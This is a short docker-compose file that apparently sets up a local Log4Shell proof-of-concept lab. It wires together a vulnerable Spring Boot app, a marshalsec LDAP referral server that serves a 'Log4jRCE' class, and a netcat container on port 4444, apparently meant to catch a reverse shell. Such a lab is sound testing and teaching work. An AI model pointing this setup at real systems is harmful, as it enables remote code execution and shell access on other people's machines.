version: '3.4'

services:
  reverse_tcp:
    image: appropriate/nc
    command: 127.0.0.1 4444 
    depends_on:
      - sprint-boot-app
      - marshalsec

  marshalsec:
    image: marshalsec
    command: java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:1234/#Log4jRCE"
    expose:
      - "1234"
    depends_on:
      - sprint-boot-app

  sprint-boot-app:
    image: poc:latest
    expose:
      - "8080"
    ports:
      - "8080:8080"

